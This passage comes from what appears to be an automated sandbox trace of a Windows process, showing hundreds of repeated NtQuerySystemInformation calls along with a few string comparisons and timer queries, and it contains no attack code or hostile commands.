Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5c0, Length=0x28, ResultLength=0x0) [0229.480] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.480] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x28, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.490] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd590 | out: lpSystemTimeAsFileTime=0xc7520fd590*(dwLowDateTime=0xea0ea7a8, dwHighDateTime=0x1d5fb6e)) [0229.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0229.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0229.491] GetTickCount () returned 0x1179ed3 [0229.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0229.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0229.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, 